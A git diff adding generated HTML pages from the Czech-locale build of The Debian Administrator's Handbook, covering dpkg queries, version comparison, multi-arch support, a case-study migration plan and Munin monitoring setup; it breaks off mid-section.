+/usr/share/man/fr/man8
+/usr/share/man/fr/man8/update-passwd.8.gz
+/usr/share/man/ja
+/usr/share/man/ja/man8
+/usr/share/man/ja/man8/update-passwd.8.gz
+/usr/share/man/man8
+/usr/share/man/man8/update-passwd.8.gz
+/usr/share/man/pl
+/usr/share/man/pl/man8
+/usr/share/man/pl/man8/update-passwd.8.gz
+/usr/share/man/ru
+/usr/share/man/ru/man8
+/usr/share/man/ru/man8/update-passwd.8.gz
+$ </code><strong
+                  class="userinput"><code>dpkg -S /bin/date</code></strong>
+<code
+                  class="computeroutput">coreutils: /bin/date
+$ </code><strong
+                  class="userinput"><code>dpkg -s coreutils</code></strong>
+<code
+                  class="computeroutput">Package: coreutils
+Essential: yes
+Status: install ok installed
+Priority: required
+Section: utils
+Installed-Size: 15103
+Maintainer: Michael Stone &lt;mstone@debian.org&gt;
+Architecture: amd64
+Multi-Arch: foreign
+Version: 8.26-3
+Replaces: mktemp, realpath, timeout
+Pre-Depends: libacl1 (&gt;= 2.2.51-8), libattr1 (&gt;= 1:2.4.46-8), libc6 (&gt;= 2.17), libselinux1 (&gt;= 2.1.13)
+Conflicts: timeout
+Description: GNU core utilities
+ This package contains the basic file, shell and text manipulation
+ utilities which are expected to exist on every operating system.
+ .
+ Specifically, this package includes:
+ arch base64 basename cat chcon chgrp chmod chown chroot cksum comm cp
+ csplit cut date dd df dir dircolors dirname du echo env expand expr
+ factor false flock fmt fold groups head hostid id install join link ln
+ logname ls md5sum mkdir mkfifo mknod mktemp mv nice nl nohup nproc numfmt
+ od paste pathchk pinky pr printenv printf ptx pwd readlink realpath rm
+ rmdir runcon sha*sum seq shred sleep sort split stat stty sum sync tac
+ tail tee test timeout touch tr true truncate tsort tty uname unexpand
+ uniq unlink users vdir wc who whoami yes
+Homepage: http://gnu.org/software/coreutils
+$ </code><strong
+                  class="userinput"><code>dpkg -l 'b*'</code></strong>
+<code
+                  class="computeroutput">Desired=Unknown/Install/Remove/Purge/Hold
+| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
+|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
+||/ Name                 Version         Architecture    Description
++++-====================-===============-===============-=============================================
+un  backupninja          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  backuppc             &lt;none&gt;          &lt;none&gt;          (no description available)
+un  baekmuk-ttf          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base                 &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base-config          &lt;none&gt;          &lt;none&gt;          (no description available)
+ii  base-files           9.9+deb9u1      amd64           Debian base system miscellaneous files
+ii  base-passwd          3.5.43          amd64           Debian base system master password and group 
+ii  bash                 4.4-5           amd64           GNU Bourne Again SHell
+[...]
+$ </code><strong
+                  class="userinput"><code>dpkg -c /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</code></strong>
+<code
+                  class="computeroutput">drwxr-xr-x root/root         0 2017-09-18 20:41 ./
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/bin/
+-rwxr-xr-x root/root    996648 2017-09-18 20:41 ./usr/bin/gpg
+-rwxr-xr-x root/root      3444 2017-09-18 20:41 ./usr/bin/gpg-zip
+-rwxr-xr-x root/root    161192 2017-09-18 20:41 ./usr/bin/gpgconf
+-rwxr-xr-x root/root     26696 2017-09-18 20:41 ./usr/bin/gpgparsemail
+-rwxr-xr-x root/root     76112 2017-09-18 20:41 ./usr/bin/gpgsplit
+-rwxr-xr-x root/root    158344 2017-09-18 20:41 ./usr/bin/kbxutil
+-rwxr-xr-x root/root      1081 2014-06-25 16:17 ./usr/bin/lspgpot
+-rwxr-xr-x root/root      2194 2017-09-18 20:41 ./usr/bin/migrate-pubring-from-classic-gpg
+-rwxr-xr-x root/root     14328 2017-09-18 20:41 ./usr/bin/watchgnupg
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/sbin/
+-rwxr-xr-x root/root      3078 2017-09-18 20:41 ./usr/sbin/addgnupghome
+-rwxr-xr-x root/root      2219 2017-09-18 20:41 ./usr/sbin/applygnupgdefaults
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/gnupg/
+-rw-r--r-- root/root     18964 2017-01-23 18:39 ./usr/share/doc/gnupg/DETAILS.gz
+[...]
+$ </code><strong
+                  class="userinput"><code>dpkg -I /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</code></strong>
+<code
+                  class="computeroutput"> new debian package, version 2.0.
+ size 1124042 bytes: control archive=2221 bytes.
+    1388 bytes,    24 lines      control              
+    2764 bytes,    43 lines      md5sums              
+ Package: gnupg
+ Source: gnupg2
+ Version: 2.1.18-8~deb9u1
+ Architecture: amd64
+ Maintainer: Debian GnuPG Maintainers &lt;pkg-gnupg-maint@lists.alioth.debian.org&gt;
+ Installed-Size: 2088
+ Depends: gnupg-agent (= 2.1.18-8~deb9u1), libassuan0 (&gt;= 2.0.1), libbz2-1.0, libc6 (&gt;= 2.15), libgcrypt20 (&gt;= 1.7.0), libgpg-error0 (&gt;= 1.14), libksba8 (&gt;= 1.3.4), libreadline7 (&gt;= 6.0), libsqlite3-0 (&gt;= 3.7.15), zlib1g (&gt;= 1:1.1.4)
+ Recommends: dirmngr (= 2.1.18-8~deb9u1), gnupg-l10n (= 2.1.18-8~deb9u1)
+ Suggests: parcimonie, xloadimage
+ Breaks: debsig-verify (&lt;&lt; 0.15), dirmngr (&lt;&lt; 2.1.18-8~deb9u1), gnupg2 (&lt;&lt; 2.1.11-7+exp1), libgnupg-interface-perl (&lt;&lt; 0.52-3), libgnupg-perl (&lt;= 0.19-1), libmail-gnupg-perl (&lt;= 0.22-1), monkeysphere (&lt;&lt; 0.38~), php-crypt-gpg (&lt;= 1.4.1-1), python-apt (&lt;= 1.1.0~beta4), python-gnupg (&lt;&lt; 0.3.8-3), python3-apt (&lt;= 1.1.0~beta4)
+ Replaces: gnupg2 (&lt;&lt; 2.1.11-7+exp1)
+ Provides: gpg
+ Section: utils
+ Priority: optional
+ Multi-Arch: foreign
+ Homepage: https://www.gnupg.org/
+ Description: GNU privacy guard - a free PGP replacement
+  GnuPG is GNU's tool for secure communication and data storage.
+  It can be used to encrypt data and to create digital signatures.
+  It includes an advanced key management facility and is compliant
+  with the proposed OpenPGP Internet standard as described in RFC4880.
+[...]</code></pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Comparison of versions</strong></p></div></div></div><a
+              id="id-1.8.8.7.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.8.7.8.3"
+              class="indexterm"></a><div
+              class="para">
+				Since <code
+                class="command">dpkg</code> is the program for handling Debian packages, it also provides the reference implementation of the logic of comparing version numbers. This is why it has a <code
+                class="literal">--compare-versions</code> option, usable by external programs (especially configuration scripts executed by <code
+                class="command">dpkg</code> itself). This option requires three parameters: a version number, a comparison operator, and a second version number. The different possible operators are <code
+                class="literal">lt</code> (strictly less than), <code
+                class="literal">le</code> (less than or equal to), <code
+                class="literal">eq</code> (equal), <code
+                class="literal">ne</code> (not equal), <code
+                class="literal">ge</code> (greater than or equal to), and <code
+                class="literal">gt</code> (strictly greater than). If the comparison is correct, <code
+                class="command">dpkg</code> returns 0 (success); if not, it gives a non-zero return value (indicating failure).
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 1.2-3 gt 1.1-4</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">0
+$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 1.2-3 lt 1.1-4</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">1
+$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 2.6.0pre3-1 lt 2.6.0-1</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">1</code></pre><div
+              class="para">
+				Note the unexpected failure of the last comparison: for <code
+                class="command">dpkg</code>, <code
+                class="literal">pre</code>, usually denoting a pre-release, has no particular meaning, and this program compares the alphabetic characters in the same way as the numbers (a &lt; b &lt; c ...), in alphabetical order. This is why it considers “<code
+                class="literal">0pre3</code>” to be greater than “<code
+                class="literal">0</code>”. When we want a package's version number to indicate that it is a pre-release, we use the tilde character, “<code
+                class="literal">~</code>”:
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 2.6.0~pre3-1 lt 2.6.0-1</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">0</code></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.8"></a>5.4.4. <code
+                    class="command">dpkg</code>'s Log File</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">dpkg</code> keeps a log of all of its actions in <code
+              class="filename">/var/log/dpkg.log</code>. This log is extremely verbose, since it details every one of the stages through which packages handled by <code
+              class="command">dpkg</code> go. In addition to offering a way to track dpkg's behavior, it helps, above all, to keep a history of the development of the system: one can find the exact moment when each package has been installed or updated, and this information can be extremely useful in understanding a recent change in behavior. Additionally, all versions being recorded, it is easy to cross-check the information with the <code
+              class="filename">changelog.Debian.gz</code> for packages in question, or even with online bug reports.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.multi-arch"></a>5.4.5. Multi-Arch Support</h3></div></div></div><a
+            id="id-1.8.8.9.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.9.3"
+            class="indexterm"></a><div
+            class="para">
+				All Debian packages have an <code
+              class="literal">Architecture</code> field in their control information. This field can contain either “<code
+              class="literal">all</code>” (for packages that are architecture independent) or the name of the architecture that it targets (like “amd64”, “armhf”, …). In the latter case, by default, <code
+              class="command">dpkg</code> will only accept to install the package if its architecture matches the host's architecture as returned by <code
+              class="command">dpkg --print-architecture</code>.
+			</div><div
+            class="para">
+				This restriction ensures that users do not end up with binaries compiled for an incorrect architecture. Everything would be perfect except that (some) computers can run binaries for multiple architectures, either natively (an “amd64“ system can run “i386” binaries) or through emulators.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.8.9.6"></a>5.4.5.1. Enabling Multi-Arch</h4></div></div></div><div
+              class="para">
+					<code
+                class="command">dpkg</code>'s multi-arch support allows users to define “foreign architectures” that can be installed on the current system. This is simply done with <code
+                class="command">dpkg --add-architecture</code> like in the example below. There is a corresponding <code
+                class="command">dpkg --remove-architecture</code> to drop support of a foreign architecture, but it can only be used when no packages of this architecture remain.
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-architecture</code></strong>
+<code
+                class="computeroutput">amd64
+# </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</code></strong>
+<code
+                class="computeroutput">dpkg: error processing archive gcc-6-base_6.3.0-18_armhf.deb (--install):
+ package architecture (armhf) does not match system (amd64)
+Errors were encountered while processing:
+ gcc-6-base_6.3.0-18_armhf.deb
+# </code><strong
+                class="userinput"><code>dpkg --add-architecture armhf</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --add-architecture armel</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput">armhf
+armel
+# </code><strong
+                class="userinput"><code>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</code></strong>
+<code
+                class="computeroutput">Selecting previously unselected package gcc-6-base:armhf.
+(Reading database ... 112000 files and directories currently installed.)
+Preparing to unpack gcc-6-base_6.3.0-18_armhf.deb ...
+Unpacking gcc-6-base:armhf (6.3.0-18) ...
+Setting up gcc-6-base:armhf (6.3.0-18) ...
+# </code><strong
+                class="userinput"><code>dpkg --remove-architecture armhf</code></strong>
+<code
+                class="computeroutput">dpkg: error: cannot remove architecture 'armhf' currently in use by the database
+# </code><strong
+                class="userinput"><code>dpkg --remove-architecture armel</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput">armhf</code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> APT's multi-arch support</strong></p></div></div></div><div
+                class="para">
+					APT will automatically detect when dpkg has been configured to support foreign architectures and will start downloading the corresponding <code
+                  class="filename">Packages</code> files durings its update process.
+				</div><div
+                class="para">
+					Foreign packages can then be installed with <code
+                  class="command">apt install <em
+                    class="replaceable">package</em>:<em
+                    class="replaceable">architecture</em></code>.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Using proprietary i386 binaries on amd64</strong></p></div></div></div><div
+                class="para">
+					There are multiple use cases for multi-arch, but the most popular one is the possibility to execute 32 bit binaries (i386) on 64 bit systems (amd64).
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.8.9.7"></a>5.4.5.2. Multi-Arch Related Changes</h4></div></div></div><div
+              class="para">
+					To make multi-arch actually useful and usable, libraries had to be repackaged and moved to an architecture-specific directory so that multiple copies (targeting different architectures) can be installed alongside. Such updated packages contain the “<code
+                class="literal">Multi-Arch: same</code>” header field to tell the packaging system that the various architectures of the package can be safely co-installed (and that those packages can only satisfy dependencies of packages of the same architecture). The most important libraries have been converted since the introduction of multi-arch in Debian <span
+                class="distribution distribution">Wheezy</span>, but there are many libraries that will likely never be converted unless someone specifically requests it (through a bug report for example).
+				</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg -s gcc-6-base
+</code></strong><code
+                class="computeroutput">dpkg-query: error: --status needs a valid package name but 'gcc-6-base' is not: ambiguous package name 'gcc-6-base' with more than one installed instance
+
+Use --help for help about querying packages.
+$ </code><strong
+                class="userinput"><code>dpkg -s gcc-6-base:amd64 gcc-6-base:armhf | grep ^Multi
+</code></strong><code
+                class="computeroutput">Multi-Arch: same
+Multi-Arch: same
+$ </code><strong
+                class="userinput"><code>dpkg -L libgcc1:amd64 |grep .so
+</code></strong><code
+                class="computeroutput">/lib/x86_64-linux-gnu/libgcc_s.so.1
+$ </code><strong
+                class="userinput"><code>dpkg -S /usr/share/doc/gcc-6-base/copyright
+</code></strong><code
+                class="computeroutput">gcc-6-base:amd64, gcc-6-base:armhf: /usr/share/doc/gcc-6-base/copyright
+</code></pre><div
+              class="para">
+					It is worth noting that <code
+                class="literal">Multi-Arch: same</code> packages must have their names qualified with their architecture to be unambiguously identifiable. They also have the possibility to share files with other instances of the same package; <code
+                class="command">dpkg</code> ensures that all packages have bit-for-bit identical files when they are shared. Last but not least, all instances of a package must have the same version. They must thus be upgraded together.
+				</div><div
+              class="para">
+					Multi-Arch support also brings some interesting challenges in the way dependencies are handled. Satisfying a dependency requires either a package marked “<code
+                class="literal">Multi-Arch: foreign</code>” or a package whose architecture matches the one of the package declaring the dependency (in this dependency resolution process, architecture-independent packages are assumed to be of the same architecture than the host). A dependency can also be weakened to allow any architecture to fulfill it, with the <code
+                class="literal"><em
+                  class="replaceable">package</em>:any</code> syntax, but foreign packages can only satisfy such a dependency if they are marked “<code
+                class="literal">Multi-Arch: allowed</code>”.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.source-package-structure.html"><strong>Předcházející</strong>5.3. Structure of a Source Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Další</strong>5.5. Coexistence with Other Packaging Systems</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.master-plan.html b/tmp/cs-CZ/html/sect.master-plan.html
new file mode 100644
index 000000000..6278d2e6a
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.master-plan.html
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.2. Master Plan</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="next"
+        href="sect.why-gnu-linux.html"
+        title="2.3. Why a GNU/Linux Distribution?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.master-plan.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="case-study.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-gnu-linux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.master-plan"></a>2.2. Master Plan</h2></div></div></div><a
+          id="id-1.5.6.2"
+          class="indexterm"></a><a
+          id="id-1.5.6.3"
+          class="indexterm"></a><div
+          class="para">
+			With your collaboration, IT management has conducted a slightly more extensive study, identifying some constraints and defining a plan for migration to the chosen Open Source system, Debian.
+		</div><div
+          class="para">
+			A significant constraint identified is that the accounting department uses specific software, which only runs on <span
+            class="trademark">Microsoft Windows</span>™. The laboratory, for its part, uses computer aided design software that runs on <span
+            class="trademark">OS X</span>™.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.5.6.6"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/case-study.png"
+                alt="Overview of the Falcot Corp network" /></div></div><p
+            class="title"><strong>Obrázek 2.1. Overview of the Falcot Corp network</strong></p></div><div
+          class="para">
+			The switch to Debian will be gradual; a small business, with limited means, cannot reasonably change everything overnight. For starters, the IT staff must be trained in Debian administration. The servers will then be converted, starting with the network infrastructure (routers, firewalls, etc.) followed by the user services (file sharing, Web, SMTP, etc.). Then the office computers will be gradually migrated to Debian, for each department to be trained (internally) during the deployment of the new system.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="case-study.html"><strong>Předcházející</strong>Kapitola 2. Presenting the Case Study</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-gnu-linux.html"><strong>Další</strong>2.3. Why a GNU/Linux Distribution?</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.monitoring.html b/tmp/cs-CZ/html/sect.monitoring.html
new file mode 100644
index 000000000..031757c7b
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.monitoring.html
@@ -0,0 +1,486 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.4. Monitoring</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="sect.automated-installation.html"
+        title="12.3. Automated Installation" /><link
+        rel="next"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.monitoring.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automated-installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="workstation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.monitoring"></a>12.4. Monitoring</h2></div></div></div><div
+          class="para">
+			Monitoring is a generic term, and the various involved activities have several goals: on the one hand, following usage of the resources provided by a machine allows anticipating saturation and the subsequent required upgrades; on the other hand, alerting the administrator as soon as a service is unavailable or not working properly means that the problems that do happen can be fixed sooner.
+		</div><div
+          class="para">
+			<span
+            class="emphasis"><em>Munin</em></span> covers the first area, by displaying graphical charts for historical values of a number of parameters (used RAM, occupied disk space, processor load, network traffic, Apache/MySQL load, and so on). <span
+            class="emphasis"><em>Nagios</em></span> covers the second area, by regularly checking that the services are working and available, and sending alerts through the appropriate channels (e-mails, text messages, and so on). Both have a modular design, which makes it easy to create new plug-ins to monitor specific parameters or services.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Zabbix, an integrated monitoring tool</strong></p></div></div></div><a
+            id="id-1.15.7.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Although Munin and Nagios are in very common use, they are not the only players in the monitoring field, and each of them only handles half of the task (graphing on one side, alerting on the other). Zabbix, on the other hand, integrates both parts of monitoring; it also has a web interface for configuring the most common aspects. It has grown by leaps and bounds during the last few years, and can now be considered a viable contender. On the monitoring server, you would install <span
+              class="pkg pkg">zabbix-server-pgsql</span> (or <span
+              class="pkg pkg">zabbix-server-mysql</span>), possibly together with <span
+              class="pkg pkg">zabbix-frontend-php</span> to have a web interface. On the hosts to monitor you would install <span
+              class="pkg pkg">zabbix-agent</span> feeding data back to the server. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.zabbix.com/">http://www.zabbix.com/</a></div>
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Icinga, a Nagios fork</strong></p></div></div></div><a
+            id="id-1.15.7.5.2"
+            class="indexterm"></a><div
+            class="para">
+			Spurred by divergences in opinions concerning the development model for Nagios (which is controlled by a company), a number of developers forked Nagios and use Icinga as their new name. Icinga is still compatible — so far — with Nagios configurations and plugins, but it also adds extra features. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.icinga.org/">http://www.icinga.org/</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.munin"></a>12.4.1. Setting Up Munin</h3></div></div></div><a
+            id="id-1.15.7.6.2"
+            class="indexterm"></a><div
+            class="para">
+				The purpose of Munin is to monitor many machines; therefore, it quite naturally uses a client/server architecture. The central host — the grapher — collects data from all the monitored hosts, and generates historical graphs.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.6.4"></a>12.4.1.1. Configuring Hosts To Monitor</h4></div></div></div><div
+              class="para">
+					The first step is to install the <span
+                class="pkg pkg">munin-node</span> package. The daemon installed by this package listens on port 4949 and sends back the data collected by all the active plugins. Each plugin is a simple program returning a description of the collected data as well as the latest measured value. Plugins are stored in <code
+                class="filename">/usr/share/munin/plugins/</code>, but only those with a symbolic link in <code
+                class="filename">/etc/munin/plugins/</code> are really used.
+				</div><div
+              class="para">
+					When the package is installed, a set of active plugins is determined based on the available software and the current configuration of the host. However, this autoconfiguration depends on a feature that each plugin must provide, and it is usually a good idea to review and tweak the results by hand. Browsing the <a
+                href="http://gallery.munin-monitoring.org">Plugin Gallery</a> can be interesting even though not all plugins have comprehensive documentation. However, all plugins are scripts and most are rather simple and well-commented. Browsing <code
+                class="filename">/etc/munin/plugins/</code> is therefore a good way of getting an idea of what each plugin is about and determining which should be removed. Similarly, enabling an interesting plugin found in <code
+                class="filename">/usr/share/munin/plugins/</code> is a simple matter of setting up a symbolic link with <code
+                class="command">ln -sf /usr/share/munin/plugins/<em
+                  class="replaceable">plugin</em> /etc/munin/plugins/</code>. Note that when a plugin name ends with an underscore “_”, the plugin requires a parameter. This parameter must be stored in the name of the symbolic link; for instance, the “if_” plugin must be enabled with a <code
+                class="filename">if_eth0</code> symbolic link, and it will monitor network traffic on the eth0 interface.
+				</div><div
+              class="para">
+					Once all plugins are correctly set up, the daemon configuration must be updated to describe access control for the collected data. This involves <code
+                class="literal">allow</code> directives in the <code
+                class="filename">/etc/munin/munin-node.conf</code> file. The default configuration is <code
+                class="literal">allow ^127\.0\.0\.1$</code>, and only allows access to the local host. An administrator will usually add a similar line containing the IP address of the grapher host, then restart the daemon with <code
+                class="command">service munin-node restart</code>.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Creating local plugins</strong></p></div></div></div><div
+                class="para">
+					Munin does include detailed documentation on how plugins should behave, and how to develop new plugins. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://munin-monitoring.org/wiki/plugins">http://munin-monitoring.org/wiki/plugins</a></div>
+				</div><div
+                class="para">
+					A plugin is best tested when run in the same conditions as it would be when triggered by munin-node; this can be simulated by running <code
+                  class="command">munin-run <em
+                    class="replaceable">plugin</em></code> as root. A potential second parameter given to this command (such as <code
+                  class="literal">config</code>) is passed to the plugin as a parameter.
+				</div><div
+                class="para">
+					When a plugin is invoked with the <code
+                  class="literal">config</code> parameter, it must describe itself by returning a set of fields:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo munin-run load config
+</code></strong><code
+                  class="computeroutput">graph_title Load average
+graph_args --base 1000 -l 0
+graph_vlabel load
+graph_scale no
+graph_category system
+load.label load
+graph_info The load average of the machine describes how many processes are in the run-queue (scheduled to run "immediately").
+load.info 5 minute load average
+</code></pre><div
+                class="para">
+					The various available fields are described by the “Plugin reference” available as part of the “Munin guide”. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://munin.readthedocs.org/en/latest/reference/plugin.html">http://munin.readthedocs.org/en/latest/reference/plugin.html</a></div>
+				</div><div
+                class="para">
+					When invoked without a parameter, the plugin simply returns the last measured values; for instance, executing <code
+                  class="command">sudo munin-run load</code> could return <code
+                  class="literal">load.value 0.12</code>.
+				</div><div
+                class="para">
+					Finally, when a plugin is invoked with the <code
